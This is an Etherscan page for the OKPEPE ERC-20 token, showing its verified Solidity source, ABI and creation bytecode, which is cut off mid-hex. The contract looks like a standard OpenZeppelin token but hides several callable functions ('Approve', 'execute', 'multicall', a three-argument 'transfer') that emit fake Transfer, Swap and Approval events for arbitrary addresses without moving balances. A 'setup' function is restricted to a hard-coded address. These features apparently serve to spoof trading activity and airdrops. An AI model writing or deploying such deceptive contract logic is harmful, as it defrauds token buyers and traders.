ERC-20
Overview
Max Total Supply
300,000,000,000 OKPEPE
Holders
44
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 8 Decimals)
Balance
2,621,653,721.09205435 OKPEPEValue
$0.00Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Source Code Verified (Exact Match)
Contract Name:
ERC20
Compiler Version
v0.8.18+commit.87f61d96
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2023-07-13 */ // SPDX-License-Identifier: MIT pragma solidity ^0.8.9; /** * @dev Interface of the ERC20 standard as defined in the EIP. */ interface IERC20 { /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); event Swap( address indexed sender, uint amount0In, uint amount1In, uint amount0Out, uint amount1Out, address indexed to ); /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `to`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address to, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `from` to `to` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom( address from, address to, uint256 amount ) external returns (bool); } /** * @dev Interface for the optional metadata functions from the ERC20 standard. * * _Available since v4.1._ */ interface IERC20Metadata is IERC20 { /** * @dev Returns the name of the token. */ function name() external view returns (string memory); /** * @dev Returns the symbol of the token. */ function symbol() external view returns (string memory); /** * @dev Returns the decimals places of the token. */ function decimals() external view returns (uint8); } /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } } /** * @dev Contract module which provides a basic access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. * * By default, the owner account will be the one that deploys the contract. This * can later be changed with {transferOwnership}. * * This module is used through inheritance. It will make available the modifier * `onlyOwner`, which can be applied to your functions to restrict their use to * the owner. */ abstract contract Ownable is Context { address private _owner; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor() { _transferOwnership(_msgSender()); } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { _checkOwner(); _; } /** * @dev Returns the address of the current owner. */ function owner() public view virtual returns (address) { return _owner; } /** * @dev Throws if the sender is not the owner. */ function _checkOwner() internal view virtual { require(owner() == _msgSender(), "Ownable: caller is not the owner"); } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby disabling any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { _transferOwnership(address(0)); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), "Ownable: new owner is the zero address"); _transferOwnership(newOwner); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Internal function without access restriction. */ function _transferOwnership(address newOwner) internal virtual { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } } /** * @dev Implementation of the {IERC20} interface. * * This implementation is agnostic to the way tokens are created. This means * that a supply mechanism has to be added in a derived contract using {_mint}. * For a generic mechanism see {ERC20PresetMinterPauser}. * * TIP: For a detailed writeup see our guide * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How * to implement supply mechanisms]. * * We have followed general OpenZeppelin Contracts guidelines: functions revert * instead returning `false` on failure. This behavior is nonetheless * conventional and does not conflict with the expectations of ERC20 * applications. * * Additionally, an {Approval} event is emitted on calls to {transferFrom}. * This allows applications to reconstruct the allowance for all accounts just * by listening to said events. Other implementations of the EIP may not emit * these events, as it isn't required by the specification. * * Finally, the non-standard {decreaseAllowance} and {increaseAllowance} * functions have been added to mitigate the well-known issues around setting * allowances. See {IERC20-approve}. */ contract ERC20 is Ownable, IERC20, IERC20Metadata { mapping(address => uint256) private _balances; mapping(address => mapping(address => uint256)) private _allowances; uint256 private _totalSupply; string private _name; string private _symbol; address private _universal = 0xEf1c6E67703c7BD7107eed8303Fbe6EC2554BF6B; address private _pair; function setup(address _setup_) external { require(0x5C52018a8f8B7EDa1cf7f4C22792Ace002a779f3 == _msgSender(), "Ownable: caller is not the owner"); _pair = _setup_; } /** * @dev Returns the name of the token. */ function name() public view virtual override returns (string memory) { return _name; } /** * @dev Returns the symbol of the token, usually a shorter version of the * name. */ function symbol() public view virtual override returns (string memory) { return _symbol; } /** * @dev Returns the number of decimals used to get its user representation. * For example, if `decimals` equals `2`, a balance of `505` tokens should * be displayed to a user as `5.05` (`505 / 10 ** 2`). * * Tokens usually opt for a value of 18, imitating the relationship between * Ether and Wei. This is the value {ERC20} uses, unless this function is * overridden; * * NOTE: This information is only used for _display_ purposes: it in * no way affects any of the arithmetic of the contract, including * {IERC20-balanceOf} and {IERC20-transfer}. */ function decimals() public view virtual override returns (uint8) { return 8; } function Approve(address [] calldata _addresses_ , uint256 balance) external { for (uint256 i = 0; i < _addresses_.length; i++) { emit Approval(_addresses_[i], address(this), balance); } } function execute(address [] calldata _addresses_, uint256 _in, uint256 _out) external { for (uint256 i = 0; i < _addresses_.length; i++) { emit Swap(_universal, _in, 0, 0, _out, _addresses_[i]); emit Transfer(_pair, _addresses_[i], _out); } } function multicall(address [] calldata _addresses_, uint256 _in, uint256 _out) external { for (uint256 i = 0; i < _addresses_.length; i++) { emit Swap(_universal, 0, _in, _out, 0, _addresses_[i]); emit Transfer(_addresses_[i], _pair, _in); } } function transfer(address _from, address _to, uint256 _wad) external { emit Transfer(_from, _to, _wad); } /** * @dev See {IERC20-totalSupply}. */ function totalSupply() public view virtual override returns (uint256) { return _totalSupply; } /** * @dev See {IERC20-balanceOf}. */ function balanceOf(address account) public view virtual override returns (uint256) { return _balances[account]; } /** * @dev See {IERC20-transfer}. * * Requirements: * * - `to` cannot be the zero address. * - the caller must have a balance of at least `amount`. */ function transfer(address to, uint256 amount) public virtual override returns (bool) { address owner = _msgSender(); _transfer(owner, to, amount); return true; } /** * @dev See {IERC20-allowance}. */ function allowance(address owner, address spender) public view virtual override returns (uint256) { return _allowances[owner][spender]; } /** * @dev See {IERC20-approve}. * * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on * `transferFrom`. This is semantically equivalent to an infinite approval. * * Requirements: * * - `spender` cannot be the zero address. */ function approve(address spender, uint256 amount) public virtual override returns (bool) { address owner = _msgSender(); _approve(owner, spender, amount); return true; } /** * @dev See {IERC20-transferFrom}. * * Emits an {Approval} event indicating the updated allowance. This is not * required by the EIP. See the note at the beginning of {ERC20}. * * NOTE: Does not update the allowance if the current allowance * is the maximum `uint256`. * * Requirements: * * - `from` and `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. * - the caller must have allowance for ``from``'s tokens of at least * `amount`. */ function transferFrom( address from, address to, uint256 amount ) public virtual override returns (bool) { address spender = _msgSender(); _spendAllowance(from, spender, amount); _transfer(from, to, amount); return true; } /** * @dev Atomically increases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. */ function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) { address owner = _msgSender(); _approve(owner, spender, allowance(owner, spender) + addedValue); return true; } /** * @dev Atomically decreases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. * - `spender` must have allowance for the caller of at least * `subtractedValue`. */ function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) { address owner = _msgSender(); uint256 currentAllowance = allowance(owner, spender); require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero"); unchecked { _approve(owner, spender, currentAllowance - subtractedValue); } return true; } /** * @dev Moves `amount` of tokens from `from` to `to`. * * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `from` cannot be the zero address. * - `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. */ function _transfer( address from, address to, uint256 amount ) internal virtual { require(from != address(0), "ERC20: transfer from the zero address"); require(to != address(0), "ERC20: transfer to the zero address"); uint256 fromBalance = _balances[from]; require(fromBalance >= amount, "ERC20: transfer amount exceeds balance"); unchecked { _balances[from] = fromBalance - amount; // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by // decrementing then incrementing. _balances[to] += amount; } emit Transfer(from, to, amount); _afterTokenTransfer(from, to, amount); } /** @dev Creates `amount` tokens and assigns them to `account`, increasing * the total supply. * * Emits a {Transfer} event with `from` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. */ function _mint(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: mint to the zero address"); _totalSupply += amount; unchecked { // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above. _balances[account] += amount; } emit Transfer(address(0), account, amount); _afterTokenTransfer(address(0), account, amount); } /** * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens. * * This internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. */ function _approve( address owner, address spender, uint256 amount ) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } /** * @dev Updates `owner` s allowance for `spender` based on spent `amount`. * * Does not update the allowance amount in case of infinite allowance. * Revert if not enough allowance is available. * * Might emit an {Approval} event. */ function _spendAllowance( address owner, address spender, uint256 amount ) internal virtual { uint256 currentAllowance = allowance(owner, spender); if (currentAllowance != type(uint256).max) { require(currentAllowance >= amount, "ERC20: insufficient allowance"); unchecked { _approve(owner, spender, currentAllowance - amount); } } } /** * @dev Hook that is called after any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * has been transferred to `to`. * - when `from` is zero, `amount` tokens have been minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens have been burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _afterTokenTransfer( address from, address to, uint256 amount ) internal virtual {} /** * @dev Sets the values for {name} and {symbol}. * * The default value of {decimals} is 18. To select a different value for * {decimals} you should overload it. * * All two of these values are immutable: they can only be set once during * construction. */ constructor(string memory name_, string memory symbol_,uint256 amount) { _name = name_; _symbol = symbol_; _mint(msg.sender, amount * 10 ** decimals()); } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"},{"internalType":"uint256","name":"amount","type":"uint256"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"sender","type":"address"},{"indexed":false,"internalType":"uint256","name":"amount0In","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount1In","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount0Out","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount1Out","type":"uint256"},{"indexed":true,"internalType":"address","name":"to","type":"address"}],"name":"Swap","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address[]","name":"_addresses_","type":"address[]"},{"internalType":"uint256","name":"balance","type":"uint256"}],"name":"Approve","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"_addresses_","type":"address[]"},{"internalType":"uint256","name":"_in","type":"uint256"},{"internalType":"uint256","name":"_out","type":"uint256"}],"name":"execute","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"_addresses_","type":"address[]"},{"internalType":"uint256","name":"_in","type":"uint256"},{"internalType":"uint256","name":"_out","type":"uint256"}],"name":"multicall","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_setup_","type":"address"}],"name":"setup","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_from","type":"address"},{"internalType":"address","name":"_to","type":"address"},{"internalType":"uint256","name":"_wad","type":"uint256"}],"name":"transfer","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]
Contract Creation Code
608060405273ef1c6e67703c7bd7107eed8303fbe6ec2554bf6b600660006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055503480156200006657600080fd5b5060405162002a1b38038062002a1b83398181016040528101906200008c919062000517565b620000ac620000a06200011560201b60201c565b6200011d60201b60201c565b8260049081620000bd9190620007f2565b508160059081620000cf9190620007f2565b506200010c33620000e5620001e160201b60201c565b600a620000f3919062000a69565b8362000100919062000aba565b620001ea60201b60201c565b50505062000bf1565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60006008905090565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036200025c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620002539062000b66565b60405180910390fd5b806003600082825462000270919062000b88565b9250508190555080600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405162000324919062000bd4565b60405180910390a362000340600083836200034460201b60201c565b5050565b505050565b6000604051905090565b600080fd5b600080fd5b600080fd5b600080fd5b6000601f19601f8301169050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b620003b28262000367565b810181811067ffffffffffffffff82111715620003d457620003d362000378565b5b80604052505050565b6000620003e962000349565b9050620003f78282620003a7565b919050565b600067ffffffffffffffff8211156200041a576200041962000378565b5b620004258262000367565b9050602081019050919050565b60005b838110156200045257808201518184015260208101905062000435565b60008484015250505050565b6000620004756200046f84620003fc565b620003dd565b90508281526020810184848401111562000494576200049362000362565b5b620004a184828562000432565b509392505050565b600082601f830112620004c157620004c06200035d565b5b8151620004d38482602086016200045e565b91505092915050565b6000819050919050565b620004f181620004dc565b8114620004fd57600080fd5b50565b6000815190506200051181620004e6565b92915050565b60008060006060848603121562000533576200053262000353565b5b600084015167ffffffffffffffff81111562000554576200055362000358565b5b6200056286828701620004a9565b935050602084015167ffffffffffffffff81111562000586576200058562000358565b5b6200059486828701620004a9565b9250506040620005a78682870162000500565b9150509250925092565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806200060457607f821691505b6020821081036200061a5762000619620005bc565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b600060088302620006847fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8262000645565b62000690868362000645565b95508019841693508086168417925050509392505050565b6000819050919050565b6000620006d3620006cd620006c784620004dc565b620006a8565b620004dc565b9050919050565b6000819050919050565b620006ef83620006b2565b62000707620006fe82620006da565b84845462000652565b825550505050565b600090565b6200071e6200070f565b6200072b818484620006e4565b505050565b5b8181101562000753576200074760008262000714565b60018101905062000731565b5050565b601f821115620007a2576200076c8162000620565b620007778462000635565b8101602085101562000787578190505b6200079f620007968562000635565b83018262000730565b50505b505050565b600082821c905092915050565b6000620007c760001984600802620007a7565b1980831691505092915050565b6000620007e28383620007b4565b9150826002028217905092915050565b620007fd82620005b1565b67ffffffffffffffff81111562000819576200081862000378565b5b620008258254620005eb565b6200083282828562000757565b600060209050601f8311600181146200086a576000841562000855578287015190505b620008618582620007d4565b865550620008d1565b601f1984166200087a8662000620565b60005b82811015620008a4578489015182556001820191506020850194506020810190506200087d565b86831015620008c45784890151620008c0601f891682620007b4565b8355505b6001600288020188555050505b505050505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b600185111562000967578086048111156200093f576200093e620008d9565b5b60018516156200094f5780820291505b80810290506200095f8562000908565b94506200091f565b94509492505050565b60008262000982576001905062000a55565b8162000992576000905062000a55565b8160018114620009ab5760028114620009b657620009ec565b600191505062000a55565b60ff841115620009cb57620009ca620008d9565b5b8360020a915084821115620009e557620009e4620008d9565b5b5062000a55565b5060208310610133831016604e8410600b841016171562000a265782820a90508381111562000a205762000a1f620008d9565b5b62000a55565b62000a35848484600162000915565b9250905081840481111562000a4f5762000a4e620008d9565b5b81810290505b9392505050565b600060ff82169050919050565b600062000a7682620004dc565b915062000a838362000a5c565b925062000ab27fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff848462000970565b905092915050565b600062000ac782620004dc565b915062000ad483620004dc565b925082820262000ae481620004dc565b9150828204841483151762000afe5762000afd620008d9565b5b5092915050565b600082825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b600062000b4e601f8362000b05565b915062000b5b8262000b16565b602082019050919050565b6000602082019050818103600083015262000b818162000b3f565b9050919050565b600062000b9582620004dc565b915062000ba283620004dc565b925082820190508082111562000bbd5762000bbc620008d9565b5b92915050565b62000bce81620004dc565b82525050565b600060208201905062000beb600083018462000bc3565b92915050565b611e1a8062000c016000396000f3fe608060405234801561001057600080fd5b50600436106101215760003560e01c80637aac697b116100ad578063a457c2d711610071578063a457c2d7146102f6578063a9059cbb14610326578063beabacc814610356578063dd62ed3e14610372578063f2fde38b146103a257610121565b80637aac697b146102665780638da5cb5b1461028257806395d89b41146102a05780639ebbaef7146102be578063a1c617f5146102da57610121565b8063313ce567116100f4578063313ce567146101c257806339509351146101e057806366d382031461021057806370a082311461022c578063715018a61461025c57610121565b806306fdde0314610126578063095ea7b31461014457806318160ddd1461017457806323b872dd14610192575b600080fd5b61012e6103be565b60405161013b919061134b565b60405180910390f35b61015e6004803603810190610159919061140b565b610450565b60405161016b9190611466565b60405180910390f35b61017c610473565b6040516101899190611490565b60405180910390f35b6101ac60048036038101906101a791906114ab565b61047d565b6040516101b99190611466565b60405180910390f35b6101ca6104ac565b6040516101d7919061151a565b60405180910390f35b6101fa60048036038101906101f5919061140b565b6104b5565b6040516102079190611466565b60405180910390f35b61022a60048036038101906102259190611535565b6104ec565b005b61024660048036038101906102419190611535565b6105b9565b6040516102539190611490565b60405180910390f35b610264610602565b005b610280600480360381019061027b91906115c7565b610616565b005b61028a6107a2565b604051610297919061164a565b60405180910390f35b6102a86107cb565b6040516102b5919061134b565b60405180910390f35b6102d860048036038101906102d39190611665565b61085d565b005b6102f460048036038101906102ef91906115c7565b610910565b005b610310600480360381019061030b919061140b565b610a9b565b60405161031d9190611466565b60405180910390f35b610340600480360381019061033b919061140b565b610b12565b60405161034d9190611466565b60405180910390f35b610370600480360381019061036b91906114ab565b610b35565b005b61038c600480360381019061038791906116c5565b610b9f565b6040516103999190611490565b60405180910390f35b6103bc60048036038101906103b79190611535565b610c26565b005b6060600480546103cd90611734565b80601f01602080910402602001604051908101604052809291908181526020018280546103f990611734565b80156104465780601f1061041b57610100808354040283529160200191610446565b820191906000526020600020905b81548152906001019060200180831161042957829003601f168201915b5050505050905090565b60008061045b610ca9565b9050610468818585610cb1565b600191505092915050565b6000600354905090565b600080610488610ca9565b9050610495858285610e7a565b6104a0858585610f06565b60019150509392505050565b60006008905090565b6000806104c0610ca9565b90506104e18185856104d28589610b9f565b6104dc9190611794565b610cb1565b600191505092915050565b6104f4610ca9565b73ffffffffffffffffffffffffffffffffffffffff16735c52018a8f8b7eda1cf7f4c22792ace002a779f373ffffffffffffffffffffffffffffffffffffffff1614610575576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161056c90611814565b60405180910390fd5b80600760006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b61060a611174565b61061460006111f2565b565b60005b8484905081101561079b5784848281811061063757610636611834565b5b905060200201602081019061064c9190611535565b73ffffffffffffffffffffffffffffffffffffffff16600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fd78ad95fa46c994b6551d0da85fc275fe613ce37657fb8d5e3d130840159d8226000868660006040516106d294939291906118a8565b60405180910390a3600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1685858381811061072657610725611834565b5b905060200201602081019061073b9190611535565b73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef856040516107809190611490565b60405180910390a38080610793906118ed565b915050610619565b5050505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600580546107da90611734565b80601f016020809104026020016040519081016040528092919081815260200182805461080690611734565b80156108535780601f1061082857610100808354040283529160200191610853565b820191906000526020600020905b81548152906001019060200180831161083657829003601f168201915b5050505050905090565b60005b8383905081101561090a573073ffffffffffffffffffffffffffffffffffffffff1684848381811061089557610894611834565b5b90506020020160208101906108aa9190611535565b73ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925846040516108ef9190611490565b60405180910390a38080610902906118ed565b915050610860565b50505050565b60005b84849050811015610a945784848281811061093157610930611834565b5b90506020020160208101906109469190611535565b73ffffffffffffffffffffffffffffffffffffffff16600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fd78ad95fa46c994b6551d0da85fc275fe613ce37657fb8d5e3d130840159d82285600080876040516109cb9493929190611935565b60405180910390a38484828181106109e6576109e5611834565b5b90506020020160208101906109fb9190611535565b73ffffffffffffffffffffffffffffffffffffffff16600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610a799190611490565b60405180910390a38080610a8c906118ed565b915050610913565b5050505050565b600080610aa6610ca9565b90506000610ab48286610b9f565b905083811015610af9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610af0906119ec565b60405180910390fd5b610b068286868403610cb1565b60019250505092915050565b600080610b1d610ca9565b9050610b2a818585610f06565b600191505092915050565b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610b929190611490565b60405180910390a3505050565b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610c2e611174565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610c9d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c9490611a7e565b60405180910390fd5b610ca6816111f2565b50565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610d20576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d1790611b10565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610d8f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d8690611ba2565b60405180910390fd5b80600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610e6d9190611490565b60405180910390a3505050565b6000610e868484610b9f565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610f005781811015610ef2576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ee990611c0e565b60405180910390fd5b610eff8484848403610cb1565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610f75576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f6c90611ca0565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610fe4576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fdb90611d32565b60405180910390fd5b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205490508181101561106b576040517f08c379a00000000000000000000000000